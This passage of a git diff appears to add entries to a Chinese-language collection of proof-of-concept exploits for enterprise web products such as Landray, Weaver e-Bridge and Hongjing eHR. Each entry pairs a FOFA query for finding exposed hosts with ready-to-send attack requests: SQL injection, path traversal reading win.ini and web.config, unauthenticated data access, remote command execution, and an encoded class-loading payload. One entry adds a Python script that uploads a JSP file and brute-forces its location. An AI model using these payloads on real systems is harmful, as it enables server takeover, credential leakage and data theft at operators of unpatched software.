3Q0pCd0NLQndDTEJ3Q05Cd0NOQndDTkJ3Q05Cd0NPQndDT0J3QVNBUUVIQUlvSEFJOEhBSTRIQUk4SEFJOEhBSThBQVFjQWtCei9BQ2NBRmdjQWlRY0FpZ2NBaXdjQWpRY0FqUWNBalFjQWpRY0FqZ2NBamdjQUVnRUJCd0NLQndDUEJ3Q09Cd0NQQndDUEJ3Q1BCd0NPQndDUkJ3Q1JBUUFBL3dEcUFCMEhBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFjQWlnY0Fqd2NBamdjQWp3Y0Fqd2NBandjQWpnY0FrUWNBa1FFSEFJOEhBSWtIQUk0SEFJOEhBSThIQUk4SEFJa0FBRklIQUpML0FHUUFGZ2NBaVFjQWlnY0Fpd2NBalFjQWpRY0FqUWNBalFjQWpnY0FqZ2NBRWdFQkJ3Q0tCd0NQQndDT0J3Q1BCd0NQQndDUEJ3Q09Cd0NSQndDUkFRQUErZ0FGL3dBSEFBd0hBSWtIQUlvSEFJc0hBSTBIQUkwSEFJMEhBSTBIQUk0SEFJNEhBQklCQVFBQStnQUYvd0FGQUFFSEFJa0FBUWNBa3djQUFRQ1VBQUFBQWdDViIpLG5ldyBqYXZheC5tYW5hZ2VtZW50LmxvYWRpbmcuTUxldChuZXcgamF2YS5uZXQuVVJMWzBdLFQgKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCk=';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a.parseExpression(deStr);c.getValue();"}]} ``` +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408070007704.png) diff --git a/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md b/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md new file mode 100644 index 0000000..bf7abe1 --- /dev/null +++ b/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +# 宏景eHR系统ajaxService接口处存在SQL注入漏洞 + +宏景eHR /ajax/ajaxService 接口处存在SQL注入漏洞,,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +## fofa + +```yaml +body="hjaxmanage.js" && (body="/template/signature/encryptionlock/websocket.js" || body="/ajax/basic.js") +``` + +## poc + +获取cookie payload: + +```yaml +/templates/index/getpassword.jsp +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062352731.png) + +```yaml +POST /ajax/ajaxService HTTP/1.1 +Host: +Cookie: 抓到的cookie +Content-Type: application/x-www-form-urlencoded + +__type=extTrans&__xml={"functionId":"151211001137","sql":"select~20sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser","nbase":"1"} +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062351899.png) \ No newline at end of file diff --git a/易捷OA协同办公软件ShowPic接口存在任意文件读取.md b/易捷OA协同办公软件ShowPic接口存在任意文件读取.md new file mode 100644 index 0000000..a6a90c1 --- /dev/null +++ b/易捷OA协同办公软件ShowPic接口存在任意文件读取.md @@ -0,0 +1,22 @@ +# 易捷OA协同办公软件ShowPic接口存在任意文件读取 + +易捷OA协同办公软件 ShowPic 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +```java +body="/images/logon/bg_img.jpg" +``` + +## poc + +```js +GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062347366.png) \ No newline at end of file diff --git a/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md b/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md new file mode 100644 index 0000000..0c3fa0d --- /dev/null +++ b/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md @@ -0,0 +1,130 @@ +# 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞 + +泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。 + +## fofa + +```yaml +app="泛微-云桥e-Bridge" +``` + +## poc + +```java +POST /wxclient/app/recruit/resume/addResume?fileElementld=111 HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: EBRIDGE_JSESSIONID=6E01926E757A8B0BE87DAA2EACC80EF6 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7 +Content-Length: 264 + +------WebKitFormBoundaryDOVhr5SwLI1wpry7 +Content-Disposition: form-data; name="file";filename="1.jsp" + +1 +------WebKitFormBoundaryDOVhr5SwLI1wpry7-- +Content-Disposition: form-data; name="file";filename="2.jsp" + +1 +------WebKitFormBoundaryDOVhr5SwLI1wpry7-- +``` + +![image-20240806141107108](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408061411331.png) + +![image-20240806141122909](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408061411965.png) + +## 脚本 + +```python +import string +import random +import sys + +import requests +import base64 +from datetime import datetime +import itertools +import urllib3 + + +def generate_random_string(length=6): + letters_and_digits = string.ascii_letters + string.digits + return ''.join(random.choice(letters_and_digits) for i in range(length)) + + +if __name__ == '__main__': + url = "" + if len(sys.argv) < 2: + print("Please Input Like: \r\npython ebridge_upload.py http://192.168.37.169:8088") + quit() + else: + url = sys.argv[1] + + proxies = {"http": "http://127.0.0.1:8080"} + letters = string.ascii_uppercase + combinations_two_letters = list(itertools.product(letters, repeat=2)) + combinations_two_letters_strings = [''.join(combo) for combo in combinations_two_letters] + combinations_single_letter_strings = list(letters) + all_combinations_strings = combinations_single_letter_strings + combinations_two_letters_strings + + now = datetime.now() + time = now.strftime("%Y%m") + + data = base64.b64decode("PCVvdXQucHJpbnRsbigiMTIzIik7JT4=").decode() + r = generate_random_string() + name = r+".jsp" + + boundary = '----WebKitFormBoundaryDOVhr5SwLI1wpry7' + + body = ( + f'--{boundary}\r\n' + f'Content-Disposition: form-data; name="file"; filename=\"{name}\"\r\n' + 'Content-Type: image/png\r\n\r\n' + f'{data}\r\n' + f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="file"; filename="2.jsp"\r\n' + 'Content-Type: image/png\r\n\r\n' + '1\r\n' + f'--{boundary}--\r\n' + ) + + headers = { + 'Content-Type': f'multipart/form-data; boundary={boundary}', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36', + 'Accept': '*/*', + 'Connection': 'keep-alive', + 'Accept-Encoding': 'gzip, deflate, br', + 'Content-Length': str(len(body)) + } + + header2 = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36', + } + + upload_path = "/wxclient/app/recruit/resume/addResume?fileElementld=111" + response = requests.post(url+upload_path, headers=headers, data=body) + if response.status_code == 200 and "success" in response.text: + + print("Successful exploitation of vulnerabilities") + print("Blasting path in progress .....") + + http = urllib3.PoolManager() + for i in all_combinations_strings: + path = url+"/upload/{}/{}/{}".format(time, str(i), r+".js%70") + # print(path) + if http.request('GET', path, headers=header2).status == 200: + print("Upload file: {}".format(path)) + break + else: + print("Failed to exploit vulnerabilities") +``` + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/b8Qsfrg1vnWlyOnuQqCzeg \ No newline at end of file diff --git a/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md b/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md new file mode 100644 index 0000000..871f630 --- /dev/null +++ b/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md @@ -0,0 +1,24 @@ +# 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞 + +**满客宝智慧食堂系统 selectUserByOrgId 接口处未进行权限控制,导致未经身份验证的远程攻击者可以未授权访问,泄露系统用户账号密码等信息.** + +## fofa + +```yaml +icon_hash="-409875651" +``` + +## poc + +```yaml +GET /yuding/selectUserByOrgId.action?record= HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240806235606039](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062356228.png) \ No newline at end of file diff --git a/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md b/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md new file mode 100644 index 0000000..c88929d --- /dev/null +++ b/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md @@ -0,0 +1,18 @@ +# 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181) + +蓝凌EIS智慧协同平台是一款专为成长型企业打造的智慧办公云平台,深度融合了阿里钉钉的功能。该平台旨在通过增强组织的协同在线、业务在线和生态在线,提升企业的工作效率和管理便捷性。 蓝凌EIS智慧协同平台存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感数据。 + +## fofa + +```yaml +icon_hash="953405444"||app="Landray-OA系统" +``` + +## poc + +```yaml +GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1;WAITFOR+DELAY+'0:0:5'-- + HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0 +``` + diff --git a/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md b/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md new file mode 100644 index 0000000..f0d8e6b --- /dev/null +++ b/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md @@ -0,0 +1,33 @@ +# 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞 + +蓝凌 EKP dataxml.tmpl存在命令执行漏洞。 + +## fofa + +```python +app="Landray-OA系统" +``` + +## poc + +```python +POST /ekp/data/sys-common/dataxml.tmpl HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 192 + +s_bean=ruleFormulaValidate&script=try { +String cmd = "ping {{interactsh-url}}"; +Process child = Runtime.getRuntime().exec(cmd); +} catch (IOException e) { +System.err.println(e); +} +``` + +![image-20240806235929945](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062359019.png) \ No newline at end of file diff --git a/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md b/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md new file mode 100644 index 0000000..cdcb17e --- /dev/null +++ b/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md @@ -0,0 +1,18 @@ +## 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞 + +赛蓝企业管理系统 GetCssFile接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```java +body="www.cailsoft.com" || body="赛蓝企业管理系统" +``` + +## poc + +```java +GET /Utility/GetCssFile?filePath=../web.config HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` +